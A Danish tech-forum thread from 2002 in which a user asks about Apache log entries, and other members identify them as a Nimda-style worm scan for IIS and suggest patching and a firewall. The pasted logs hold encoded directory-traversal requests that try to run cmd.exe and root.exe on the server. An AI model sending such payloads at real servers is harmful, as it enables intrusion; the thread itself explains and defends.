CIO Tech Eksperten IT-JOB IT-Kurser Events Podcast Søg
Cookie ikon
Avatar billede angel_seraphiel Nybegynder
24. november 2002 - 22:36 Der er 7 kommentarer og
2 løsninger

Hvorfor står der det i min log?

62.107.32.109 - - [24/Nov/2002:14:41:22 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
62.107.32.109 - - [24/Nov/2002:14:41:22 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
62.107.32.109 - - [24/Nov/2002:14:41:22 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
62.107.32.109 - - [24/Nov/2002:14:41:22 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
62.107.32.109 - - [24/Nov/2002:14:41:22 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.107.32.109 - - [24/Nov/2002:14:41:22 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
62.107.32.109 - - [24/Nov/2002:14:41:22 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
62.107.32.109 - - [24/Nov/2002:14:41:22 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
62.107.32.109 - - [24/Nov/2002:14:41:22 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.107.32.109 - - [24/Nov/2002:14:41:23 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.107.32.109 - - [24/Nov/2002:14:41:23 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.107.32.109 - - [24/Nov/2002:14:41:23 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.107.32.109 - - [24/Nov/2002:14:41:23 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
62.107.32.109 - - [24/Nov/2002:14:41:23 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
62.107.32.109 - - [24/Nov/2002:14:41:23 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.107.32.109 - - [24/Nov/2002:14:41:23 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298



Hva' er det for noget ? :/
Avatar billede angel_seraphiel Nybegynder
24. november 2002 - 22:38 #1
Min fejl-log ser sådan her ud:

[Sun Nov 24 14:41:22 2002] [error] [client 62.107.32.109] File does not exist: f:/programmer/apache group/apache/htdocs/scripts/root.exe
[Sun Nov 24 14:41:22 2002] [error] [client 62.107.32.109] File does not exist: f:/programmer/apache group/apache/htdocs/msadc/root.exe
[Sun Nov 24 14:41:22 2002] [error] [client 62.107.32.109] File does not exist: f:/programmer/apache group/apache/htdocs/c/winnt/system32/cmd.exe
[Sun Nov 24 14:41:22 2002] [error] [client 62.107.32.109] File does not exist: f:/programmer/apache group/apache/htdocs/d/winnt/system32/cmd.exe
[Sun Nov 24 14:41:22 2002] [error] [client 62.107.32.109] File does not exist: f:/programmer/apache group/apache/htdocs/scripts/..%5c/winnt/system32/cmd.exe
[Sun Nov 24 14:41:22 2002] [error] [client 62.107.32.109] File does not exist: f:/programmer/apache group/apache/htdocs/_vti_bin/..%5c/..%5c/..%5c/winnt/system32/cmd.exe
[Sun Nov 24 14:41:22 2002] [error] [client 62.107.32.109] File does not exist: f:/programmer/apache group/apache/htdocs/_mem_bin/..%5c/..%5c/..%5c/winnt/system32/cmd.exe
[Sun Nov 24 14:41:22 2002] [error] [client 62.107.32.109] File does not exist: f:/programmer/apache group/apache/htdocs/msadc/..%5c/..%5c/..%5c/..Á/..Á/..Á/winnt/system32/cmd.exe
[Sun Nov 24 14:41:22 2002] [error] [client 62.107.32.109] File does not exist: f:/programmer/apache group/apache/htdocs/scripts/..Á/winnt/system32/cmd.exe
[Sun Nov 24 14:41:23 2002] [error] [client 62.107.32.109] File does not exist: f:/programmer/apache group/apache/htdocs/scripts/..À¯/winnt/system32/cmd.exe
[Sun Nov 24 14:41:23 2002] [error] [client 62.107.32.109] File does not exist: f:/programmer/apache group/apache/htdocs/scripts/..Áœ/winnt/system32/cmd.exe
[Sun Nov 24 14:41:23 2002] [error] [client 62.107.32.109] File does not exist: f:/programmer/apache group/apache/htdocs/scripts/..%5c/winnt/system32/cmd.exe
[Sun Nov 24 14:41:23 2002] [error] [client 62.107.32.109] File does not exist: f:/programmer/apache group/apache/htdocs/scripts/..%2f/winnt/system32/cmd.exe
[Sun Nov 24 19:48:47 2002] [error] [client 210.56.14.210] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /
[Sun Nov 24 22:03:38 2002] [error] [client 213.221.189.10] File does not exist: f:/programmer/apache group/apache/htdocs//
Avatar billede bufferzone Praktikant
24. november 2002 - 22:40 #2
Det ligner et nimbda angreb, eller et angreb fra en tilsvarende mail orm. Hvis du ikke har en mail eller web server kørende skal du ikke være bekymret.

Gennemscann lige dit system med en opdateret virus scanner for en sikkerheds skyld
Avatar billede angel_seraphiel Nybegynder
24. november 2002 - 22:41 #3
bufferzone - har en apache kørende.. :(
Avatar billede wise Seniormester
24. november 2002 - 22:42 #4
Der er nogle som har teste din apache server for at se om det var en IIS, og om de dermed kunne komme ind...
De har prøvet at se om de kunne få adgang til en CMD eller en root.exe (hvad så end det er...) CMD er jo en dos promt, så hvis det havde lykkedes dem at køre en dir, så havde de også kunnet køre en format c:\

Men men men alt ser godt ud, og din apche har ikke tilladt dem at køre disse filer
Avatar billede wise Seniormester
24. november 2002 - 22:42 #5
Det er mig bekendt kun IIS der er såbar for dette angreb
Avatar billede angel_seraphiel Nybegynder
24. november 2002 - 22:43 #6
wise - jamen hvis nu der kommer en rigtig ond hacker, hva' så ? jeg gider ik' det tis.. :/
Avatar billede bufferzone Praktikant
24. november 2002 - 22:46 #7
Apache er ikke sårbar over for nimbda, men der findes sikkert mail orm der kan udnytte apache også. En ond hacker ville aldrig efterlade et så letgenkendeligt fingeraftryk.

Når du nu har en web server kørende, så kan vi godt tale sikkerhed.

Først skal du selvfølgelig have en firewall, og når du nu har en server kørende, så bør den kunne håndtere en DMZ, hvor din server så placeres
Avatar billede erikjacobsen Ekspert
24. november 2002 - 22:47 #8
Pil netværksstikket ud på din 'puter - så er du fri for angreb.
Ellers kan du bare tage det som en oplevelse... ;)
Vi andre får dem også i massevis
Avatar billede wise Seniormester
24. november 2002 - 22:48 #9
Jammen du holder vel selvfølgelig øje med om der findes huller i apache og hvis der gør, så lukker du da SELVFØLGELIG disse med det samme - det er jo derfor at der udsendes patches! Patchen som lapper IIS overfor et NIMDA angreb havde været ude i en del måneder inden angebene startede, så de maskiner der er blevet ramt er altså dem der ikke er blevet opdateret...
Den eneste 100% hackersikre løsning som findes er at klippe netkablet midt over.

Det næstbedste er at vælge en af de mere sikre webservere (fx apache fremfor IIS) og at sikre at de forskellige sikkerheds patches bliver opdateret relativt hurtigt efter at de bliver frigivet....
Avatar billede Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Loading billede Opret Preview
Kategori
Se alle it-kurser fra Computerworld Kurser
IT-kurser om Microsoft 365, sikkerhed, personlig vækst, udvikling, digital markedsføring, grafisk design, SAP og forretningsanalyse.
Se alle it-kurser

Flere spørgsmål fra Andet sikkerhed kategorien

Titel Indlæg Oprettet Seneste aktivitet
Password sikkerhed Af jhjorsal i Andet sikkerhed 2 13/07/202413:12 13/07/202422:46
Automatisering af certifikat proces - Danske virksomheder Af Søren i Andet sikkerhed 1 29/05/202414:23 30/05/202409:03
VPN i forhold til facebook? Af Novice-1 i Andet sikkerhed 2 26/05/202412:09 26/05/202420:54
Fjerne adgangskode Af Geo" søster i Andet sikkerhed 4 25/04/202418:19 26/04/202422:46
Krypetring af USB -stick Af FinBalance i Andet sikkerhed 16 04/03/202412:39 08/03/202415:52
Se alle spørgsmål i kategorien Opret spørgsmål

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Opret Log ind

Du kan også logge ind via nedenstående tjenester



Alle kategorier på Eksperten
Seneste spørgsmål Seneste aktivitet
I dag 21:08 Hvor kan man se Alan Turings mekaniske apparat til at løse Enignas koder Af KurtG i Andet hardware
I dag 18:46 Kan det passe ;-) Af fjorbak i Routere & Switches
I dag 15:27 Billeder kan ikke åbnes Jpeg.modd Af KristinaS i Billedbehandling
I dag 13:44 eM Client Af valby i E-mail programmer
I dag 13:33 Facebook gruppe Af Btimmer i Sociale medier
White papers
Flere white papers »


Premium
Teaser billede
Det er blevet kaldt ”det største it-nedbrud i historien” og omkostningerne kan nemt løbe op i syv milliarder kroner: Men hvem skal betale for Crowdstrikes fejl?
Læs mere »
Europas største software-leverandør stryger frem på cloud-fronten – men 97 procent af overskuddet er forduftet
Frustrerede synshaller og billister: Motorstyrelsens it-system plages af store driftsforstyrrelser
Fire år gamle Wiz takker nej til Alphabets historiske opkøbstilbud på 160 milliarder kroner: Satser i stedet på børsnotering
Se alle »
Computerworld
Teaser billede
Microsoft-nedbrud spreder sig: It-systemer i lufthavne verden over er ramt
Læs mere »
Test: Denne mikro-pc er smartere end de stærkeste desktop-maskiner - men flopper alligevel
Elon Musk dropper CrowdStrike efter kæmpe nedbrud
Hundredevis af flyafgange ramt af stort Microsoft-nedbrud
Se alle »
CIO
Teaser billede
Microsoft er på sagen: I gang med at løse kæmpe nedbrud efter katastrofal Crowdstrike-fejl
Læs mere »
Så mange Microsoft-enheder blev ramt af gigantisk Crowdstrike-koks
Peter Lüth udlever CTO-drømmen: Bygger et system fra bunden og tjener kassen på det
Sådan forbereder energiselskabet OK sig på cyberangreb: "Prisen for ikke at gøre noget kan være forfærdeligt høj"
Se alle »
Job & Karriere
Teaser billede
Efter 12 år er NNIT's hovedkvarter i Søborg nu ryddet og tomt - alle arbejder hjemme: "Det er med et vist vemod"
Læs mere »
Norlys skal splittes op i fem selskaber: Nu bliver flere ansatte og ledere fyret
Dansk top-profil trækker sig fra Microsoft: Skal være direktør i TDC Erhverv
KMD-direktør forlader selskabet: Det skal hun nu
Se alle »
White paper
Teaser billede
Sådan gør du: Elektronisk dokumentudveksling i praksis
Læs mere »
Optimering af Source-to-Pay: Identificér oplagte gevinster og skær omkostninger
Nemmere overblik, styring og omkostningskontrol i dit multicloud-miljø
Sådan høster du forretningsfordelene ved Internet of Things
Se alle »

Events
Flere events »
White papers
Flere white papers »
IT-Kurser
Se alle vores it-kurser »